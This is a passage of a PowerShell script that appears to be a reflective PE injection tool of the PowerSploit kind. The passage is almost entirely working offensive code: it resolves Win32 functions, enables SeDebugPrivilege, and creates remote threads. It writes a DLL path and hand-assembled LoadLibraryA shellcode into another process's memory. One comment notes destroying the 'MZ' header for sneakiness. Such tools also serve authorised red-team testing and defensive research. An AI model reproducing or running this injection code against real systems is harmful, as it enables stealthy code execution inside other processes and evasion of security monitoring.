$ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf\n\t\t\n\t\t$NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx\n        $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])\n        $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx\n\t\t\n\t\t$IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process\n        $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])\n        $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process\n\t\t\n\t\t$CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread\n        $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])\n        $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)\n\t\t$Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread\n\t\n\t\t$LocalFreeAddr = Get-ProcAddress kernel32.dll VirtualFree\n\t\t$LocalFreeDelegate = Get-DelegateType @([IntPtr])\n\t\t$LocalFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LocalFreeAddr, $LocalFreeDelegate)\n\t\t$Win32Functions | Add-Member NoteProperty -Name LocalFree -Value $LocalFree\n\n\t\treturn $Win32Functions\n\t}\n\t#####################################\n\n\t\t\t\n\t#####################################\n\t###########    HELPERS   ############\n\t#####################################\n\n\t#Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function\n\t#This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses\n\tFunction Sub-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t$Val = $Value1Bytes[$i] - $CarryOver\n\t\t\t\t#Sub bytes\n\t\t\t\tif ($Val -lt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\t$Val += 256\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t[UInt16]$Sum = $Val - $Value2Bytes[$i]\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot subtract bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\t\n\n\tFunction Add-SignedIntAsUnsigned\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\t\t[Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\t$CarryOver = 0\n\t\t\tfor ($i = 0; $i -lt $Value1Bytes.Count; $i++)\n\t\t\t{\n\t\t\t\t#Add bytes\n\t\t\t\t[UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver\n\n\t\t\t\t$FinalBytes[$i] = $Sum -band 0x00FF\n\t\t\t\t\n\t\t\t\tif (($Sum -band 0xFF00) -eq 0x100)\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 1\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$CarryOver = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot add bytearrays of different sizes\"\n\t\t}\n\t\t\n\t\treturn [BitConverter]::ToInt64($FinalBytes, 0)\n\t}\n\t\n\n\tFunction Compare-Val1GreaterThanVal2AsUInt\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value1,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$Value2\n\t\t)\n\t\t\n\t\t[Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)\n\t\t[Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)\n\n\t\tif ($Value1Bytes.Count -eq $Value2Bytes.Count)\n\t\t{\n\t\t\tfor ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)\n\t\t\t{\n\t\t\t\tif ($Value1Bytes[$i] -gt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\treturn $true\n\t\t\t\t}\n\t\t\t\telseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])\n\t\t\t\t{\n\t\t\t\t\treturn $false\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"Cannot compare byte arrays of different size\"\n\t\t}\n\t\t\n\t\treturn $false\n\t}\n\t\n\n\tFunction Convert-UIntToInt\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[UInt64]\n\t\t$Value\n\t\t)\n\t\t\n\t\t[Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)\n\t\treturn ([BitConverter]::ToInt64($ValueBytes, 0))\n\t}\n\t\n\t\n\tFunction Test-MemoryRangeValid\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[String]\n\t\t$DebugString,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$StartAddress,\n\t\t\n\t\t[Parameter(ParameterSetName = \"EndAddress\", Position = 3, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$EndAddress,\n\t\t\n\t\t[Parameter(ParameterSetName = \"Size\", Position = 3, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$Size\n\t\t)\n\t\t\n\t\t[IntPtr]$FinalEndAddress = [IntPtr]::Zero\n\t\tif ($PsCmdlet.ParameterSetName -eq \"Size\")\n\t\t{\n\t\t\t[IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$FinalEndAddress = $EndAddress\n\t\t}\n\t\t\n\t\t$PEEndAddress = $PEInfo.EndAddress\n\t\t\n\t\tif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)\n\t\t{\n\t\t\tThrow \"Trying to write to memory smaller than allocated address range. $DebugString\"\n\t\t}\n\t\tif ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)\n\t\t{\n\t\t\tThrow \"Trying to write to memory greater than allocated address range. $DebugString\"\n\t\t}\n\t}\n\t\n\t\n\tFunction Write-BytesToMemory\n\t{\n\t\tParam(\n\t\t\t[Parameter(Position=0, Mandatory = $true)]\n\t\t\t[Byte[]]\n\t\t\t$Bytes,\n\t\t\t\n\t\t\t[Parameter(Position=1, Mandatory = $true)]\n\t\t\t[IntPtr]\n\t\t\t$MemoryAddress\n\t\t)\n\t\n\t\tfor ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)\n\t\t{\n\t\t\t[System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])\n\t\t}\n\t}\n\t\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-DelegateType\n\t{\n\t    Param\n\t    (\n\t        [OutputType([Type])]\n\t        \n\t        [Parameter( Position = 0)]\n\t        [Type[]]\n\t        $Parameters = (New-Object Type[](0)),\n\t        \n\t        [Parameter( Position = 1 )]\n\t        [Type]\n\t        $ReturnType = [Void]\n\t    )\n\n\t    $Domain = [AppDomain]::CurrentDomain\n\t    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')\n\t    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)\n\t    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)\n\t    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])\n\t    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)\n\t    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')\n\t    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)\n\t    $MethodBuilder.SetImplementationFlags('Runtime, Managed')\n\t    \n\t    Write-Output $TypeBuilder.CreateType()\n\t}\n\n\n\t#Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/\n\tFunction Get-ProcAddress\n\t{\n\t    Param\n\t    (\n\t        [OutputType([IntPtr])]\n\t    \n\t        [Parameter( Position = 0, Mandatory = $True )]\n\t        [String]\n\t        $Module,\n\t        \n\t        [Parameter( Position = 1, Mandatory = $True )]\n\t        [String]\n\t        $Procedure\n\t    )\n\n\t    # Get a reference to System.dll in the GAC\n\t    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |\n\t        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\n\t    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\n\t    # Get a reference to the GetModuleHandle and GetProcAddress methods\n\t    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\n\t    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\n\t    # Get a handle to the module specified\n\t    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\n\t    $tmpPtr = New-Object IntPtr\n\t    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\n\n\t    # Return the address of the function\n\t    Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\n\t}\n\t\n\t\n\tFunction Enable-SeDebugPrivilege\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\t\t\n\t\t[IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()\n\t\tif ($ThreadHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to get the handle to the current thread\"\n\t\t}\n\t\t\n\t\t[IntPtr]$ThreadToken = [IntPtr]::Zero\n\t\t[Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\tif ($Result -eq $false)\n\t\t{\n\t\t\t$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\t\t\tif ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)\n\t\t\t{\n\t\t\t\t$Result = $Win32Functions.ImpersonateSelf.Invoke(3)\n\t\t\t\tif ($Result -eq $false)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to impersonate self\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)\n\t\t\t\tif ($Result -eq $false)\n\t\t\t\t{\n\t\t\t\t\tThrow \"Unable to OpenThreadToken.\"\n\t\t\t\t}\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tThrow \"Unable to OpenThreadToken. Error code: $ErrorCode\"\n\t\t\t}\n\t\t}\n\t\t\n\t\t[IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))\n\t\t$Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, \"SeDebugPrivilege\", $PLuid)\n\t\tif ($Result -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to call LookupPrivilegeValue\"\n\t\t}\n\n\t\t[UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)\n\t\t[IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)\n\t\t$TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)\n\t\t$TokenPrivileges.PrivilegeCount = 1\n\t\t$TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)\n\t\t$TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)\n\n\t\t$Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)\n\t\t$ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value\n\t\tif (($Result -eq $false) -or ($ErrorCode -ne 0))\n\t\t{\n\t\t\t#Throw \"Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode\"   #todo need to detect if already set\n\t\t}\n\t\t\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)\n\t}\n\t\n\t\n\tFunction Invoke-CreateRemoteThread\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$ProcessHandle,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$StartAddress,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$ArgumentPtr = [IntPtr]::Zero,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions\n\t\t)\n\t\t\n\t\t[IntPtr]$RemoteThreadHandle = [IntPtr]::Zero\n\t\t\n\t\t$OSVersion = [Environment]::OSVersion.Version\n\t\t#Vista and Win7\n\t\tif (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))\n\t\t{\n\t\t\tWrite-Verbose \"Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress\"\n\t\t\t$RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)\n\t\t\t$LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\t\t\tif ($RemoteThreadHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError\"\n\t\t\t}\n\t\t}\n\t\t#XP/Win8\n\t\telse\n\t\t{\n\t\t\tWrite-Verbose \"Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress\"\n\t\t\t$RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)\n\t\t}\n\t\t\n\t\tif ($RemoteThreadHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tWrite-Verbose \"Error creating remote thread, thread handle is null\"\n\t\t}\n\t\t\n\t\treturn $RemoteThreadHandle\n\t}\n\n\t\n\n\tFunction Get-ImageNtHeaders\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t$NtHeadersInfo = New-Object System.Object\n\t\t\n\t\t#Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness\n\t\t$dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)\n\n\t\t#Get IMAGE_NT_HEADERS\n\t\t[IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))\n\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr\n\t\t$imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)\n\t\t\n\t\t#Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.\n\t    if ($imageNtHeaders64.Signature -ne 0x00004550)\n\t    {\n\t        throw \"Invalid IMAGE_NT_HEADER signature.\"\n\t    }\n\t\t\n\t\tif ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')\n\t\t{\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32\n\t\t\t$NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false\n\t\t}\n\t\t\n\t\treturn $NtHeadersInfo\n\t}\n\n\n\t#This function will get the information needed to allocated space in memory for the PE\n\tFunction Get-PEBasicInfo\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true )]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t$PEInfo = New-Object System.Object\n\t\t\n\t\t#Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot.\n\t\t[IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null\n\t\t\n\t\t#Get NtHeadersInfo\n\t\t$NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types\n\t\t\n\t\t#Build a structure with the information which will be needed for allocating memory and writing the PE to memory\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)\n\t\t\n\t\t#Free the memory allocated above, this isn't where we allocate the PE to memory\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)\n\t\t\n\t\treturn $PEInfo\n\t}\n\n\n\t#PEInfo must contain the following NoteProperties:\n\t#\tPEHandle: An IntPtr to the address the PE is loaded to in memory\n\tFunction Get-PEDetailedInfo\n\t{\n\t\tParam(\n\t\t[Parameter( Position = 0, Mandatory = $true)]\n\t\t[IntPtr]\n\t\t$PEHandle,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants\n\t\t)\n\t\t\n\t\tif ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tthrow 'PEHandle is null or IntPtr.Zero'\n\t\t}\n\t\t\n\t\t$PEInfo = New-Object System.Object\n\t\t\n\t\t#Get NtHeaders information\n\t\t$NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types\n\t\t\n\t\t#Build the PEInfo object\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)\n\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)\n\t\t\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n\t\t}\n\t\telse\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr\n\t\t}\n\t\t\n\t\tif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)\n\t\t{\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'\n\t\t}\n\t\telseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)\n\t\t{\n\t\t\t$PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'\n\t\t}\n\t\telse\n\t\t{\n\t\t\tThrow \"PE file is not an EXE or DLL\"\n\t\t}\n\t\t\n\t\treturn $PEInfo\n\t}\n\t\n\t\n\tFunction Import-DllInRemoteProcess\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle,\n\t\t\n\t\t[Parameter(Position=1, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$ImportDllPathPtr\n\t\t)\n\t\t\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t\n\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\t\t$DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)\n\t\t$RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($RImportDllPathPtr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process\"\n\t\t}\n\n\t\t[UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)\n\t\t\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to write DLL path to remote process memory\"\n\t\t}\n\t\tif ($DllPathSize -ne $NumBytesWritten)\n\t\t{\n\t\t\tThrow \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n\t\t}\n\t\t\n\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t$LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"LoadLibraryA\") #Kernel32 loaded to the same address for all processes\n\t\t\n\t\t[IntPtr]$DllAddress = [IntPtr]::Zero\n\t\t#For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address\n\t\t#\tInstead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes.\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t#Allocate memory for the address returned by LoadLibraryA\n\t\t\t$LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\t\tif ($LoadLibraryARetMem -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate memory in the remote process for the return value of LoadLibraryA\"\n\t\t\t}\n\t\t\t\n\t\t\t\n\t\t\t#Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm)\n\t\t\t$LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n\t\t\t$LoadLibrarySC2 = @(0x48, 0xba)\n\t\t\t$LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)\n\t\t\t$LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t\t\n\t\t\t$SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)\n\t\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\t\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem 